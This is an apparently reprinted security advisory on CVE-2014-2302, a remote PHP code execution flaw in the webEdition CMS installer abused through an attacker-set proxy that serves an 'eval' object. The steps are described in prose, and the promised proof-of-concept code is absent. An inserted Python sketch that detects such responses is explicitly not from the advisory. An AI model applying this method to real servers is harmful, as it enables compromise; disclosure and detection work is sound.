[RT-SA-2014-004] Remote Command Execution in webEdition CMS Installer Script
2014-06-14T00:00:00
ID SECURITYVULNS:DOC:30854 Type securityvulns Reporter Securityvulns Modified 2014-06-14T00:00:00
Description
Advisory: Remote Command Execution in webEdition CMS Installer Script
RedTeam Pentesting discovered a remote command execution vulnerability
in the installer script of the webEdition CMS during a penetration test.
If the installer script is not manually removed after installation,
attackers can not only reinstall webEdition, but also gain remote command
execution.
Details
Product: webEdition CMS
Affected Versions: webEdition OnlineInstaller 2.8.0.0,
probably earlier versions, too
Fixed Versions: webEdition 6.2.7-s1 - 6.3.8-s1
Vulnerability Type: Remote Command Execution
Security Risk: high
Vendor URL: http://www.webedition.org
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-004
Advisory Status: published
CVE: CVE-2014-2302
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2302
Introduction
"webEdition is a flexible CMS for companies of every size. It offers a
great amount of functionality and can be flexibly customized for
individual needs. It is ideally suited for users who want to operate
their website comfortably. Even the creation of custom web applications
is easily possible with webEdition."
(translated from the webEdition homepage)
More Details
The webEdition installation script is not deleted automatically at the
end of the installation, even though it contains code to delete itself.
While an attacker who finds this script could just destructively
reinstall webEdition, it is also possible to use it to gain command
execution unnoticed on an existing webEdition installation.
During installation, the installer first checks whether outgoing
connections can be established by sending the following HTTP request to
update.webedition.org:
GET /server/we/onlineInstallation.php?update_cmd=checkConnection&
HTTP/1.0
Host: update.webedition.org
The server at update.webedition.org replies with the following HTTP
response, which contains base64-encoded data (formatted and shortened):
HTTP/1.1 200 OK
Date: Mon, 24 Feb 2014 10:34:56 GMT
Server: Apache/2.X.XX
X-Powered-By: PHP/5.X.XX
Connection: close
Content-Type: text/html
By decoding the response body it can be seen that it contains a
serialized PHP object:
a:3:{s:4:"Type";s:8:"template";s:8:"Headline";s:30:"Online Installer
version check";s:7:"Content";s:398:"<div class="messageDiv">
You are currently [...]</a>.</div>";}
This PHP object is processed by the installation script based on its
"Type" value. One of the "Type" values accepted by the installation
script is "eval", leading to the execution of PHP code which can be
specified as the value of a field named "Code", that is also part of
the serialized object.
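For defenders reviewing captured installer traffic or proxy logs, the response format described above can be checked mechanically. The following Python sketch is an added example, not code from the advisory or from webEdition: it decodes a response body, parses the serialized array and flags a "Type" of "eval". The function names, the constructed sample bodies and the case-insensitive comparison are assumptions made for this example.

```python
import base64


class PhpParseError(ValueError):
    """Raised when the input is not the PHP serialize() subset handled here."""


def _parse(buf, pos=0, depth=0):
    """Parse one serialized value at buf[pos:]; return (value, next_pos)."""
    if depth > 8:
        raise PhpParseError("nesting too deep")
    tag = buf[pos:pos + 2]
    if tag == b"N;":
        return None, pos + 2
    if tag in (b"i:", b"b:", b"d:"):
        end = buf.index(b";", pos)
        raw = buf[pos + 2:end]
        value = float(raw) if tag == b"d:" else int(raw)
        return (bool(value) if tag == b"b:" else value), end + 1
    if tag == b"s:":
        colon = buf.index(b":", pos + 2)
        length = int(buf[pos + 2:colon])       # length is counted in bytes
        start = colon + 2                      # skip the :" after the length
        end = start + length
        if length < 0 or buf[colon + 1:start] != b'"' or buf[end:end + 2] != b'";':
            raise PhpParseError("bad string framing")
        return buf[start:end].decode("utf-8", "replace"), end + 2
    if tag == b"a:":
        colon = buf.index(b":", pos + 2)
        count = int(buf[pos + 2:colon])
        if buf[colon + 1:colon + 2] != b"{":
            raise PhpParseError("bad array framing")
        pos, out = colon + 2, {}
        for _ in range(count):
            key, pos = _parse(buf, pos, depth + 1)
            if not isinstance(key, (str, int)):
                raise PhpParseError("invalid array key")
            value, pos = _parse(buf, pos, depth + 1)
            out[key] = value                   # duplicate keys: last one wins
        if buf[pos:pos + 1] != b"}":
            raise PhpParseError("unterminated array")
        return out, pos + 1
    # Objects (O:, C:) and references are deliberately not handled.
    raise PhpParseError("unsupported type tag %r" % tag)


def classify_update_response(body):
    """Classify one HTTP response body that was delivered to the installer."""
    try:
        # The body may be line-wrapped, so drop all whitespace before decoding.
        raw = base64.b64decode(b"".join(body.split()), validate=True)
        value, _end = _parse(raw)  # trailing bytes after the value are ignored
    except ValueError as exc:      # covers binascii.Error and PhpParseError
        return {"verdict": "unparseable", "reason": str(exc)}
    if not isinstance(value, dict) or "Type" not in value:
        return {"verdict": "unexpected", "reason": "no Type field"}
    kind = str(value["Type"])
    if kind.lower() == "eval":     # assumption: compare case-insensitively
        return {"verdict": "alert", "type": kind,
                "code_len": len(str(value.get("Code", "")))}
    return {"verdict": "ok", "type": kind}


# Constructed sample bodies (not captured traffic). The "Code" value is a
# harmless placeholder string, not PHP.
SAMPLE_TEMPLATE = base64.encodebytes(
    b'a:2:{s:4:"Type";s:8:"template";s:8:"Headline";s:13:"version check";}')
SAMPLE_EVAL = base64.encodebytes(
    b'a:2:{s:4:"Type";s:4:"eval";s:4:"Code";s:11:"PLACEHOLDER";}')

if __name__ == "__main__":
    for name, body in (("template", SAMPLE_TEMPLATE), ("eval", SAMPLE_EVAL)):
        print(name, classify_update_response(body))
```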
Using the Python library phpserialize, a PHP object can be crafted,
which executes the function phpinfo() when it is received by the
installation script:
The installer allows the usage of a proxy server, enabling attackers to
intercept and arbitrarily modify HTTP requests issued by the installer
and the corresponding responses by the host update.webedition.org. By
setting a proxy server to use during the installation process which
answers all requests with the base64-encoded serialized PHP object, the
previously created PHP code is loaded and evaluated by the installation
script, which leads to the execution of the attack payload. Due to the
proxy server being saved in the HTTP session used by the installation
script, execution of the code served by the proxy server can be
triggered by opening the following URL:
Proof of Concept
Use the OnlineInstaller at
http://www.example.com/OnlineInstaller/setup.php to configure webEdition
to use a system under your control as a proxy server. Configure the
proxy to deliver the following file contents for all HTTP requests:
Workaround
The OnlineInstaller should be deleted or access to its URLs restricted.
Fix
Update to a version with the suffix -s1. Those versions are available as
updates for releases between 6.2.7 and 6.3.8. The newest, updated
version would therefore be 6.3.8-s1.
Note that the version check of webEdition might tell you that there is
no update available and that you are running Version "6.3.8 (6.3.8.0
Release, SVN-Revision 6985)". It will still tell you that the newest
available version is "6.3.8-s1 (6.3.8.0 Release, SVN-Revision 6985)", so
you can use the "Update-Repetition" function to get the fix for this
vulnerability.
Also note that the update does not remove the OnlineInstaller, but
modifies the login dialogue to remove the OnlineInstaller instead. You
will need to open the login dialogue after installing the update to
actually delete the OnlineInstaller. To be on the safe side, check the
OnlineInstaller directory manually for any files that still need to be
removed.
Security Risk
Attackers can not only use the OnlineInstaller to destructively
reinstall webEdition, but can also run arbitrary PHP code by
setting their own proxy server in the OnlineInstaller and injecting content
that is used as a parameter for the PHP eval() function. Since this
attacker-supplied code is executed on the webEdition server with the
privileges of the web server, this is a high risk, especially because
the attack is not as easy to detect as a reinstallation of webEdition by
an attacker.
Timeline
2014-02-20 Vulnerability identified
2014-03-04 Customer approved disclosure to vendor
2014-03-06 CVE number requested and assigned
2014-03-07 Vendor notified
2014-03-10 Vendor acknowledges vulnerability
2014-05-20 Vendor announces fixed versions
2014-05-28 Advisory released
RedTeam Pentesting GmbH
RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.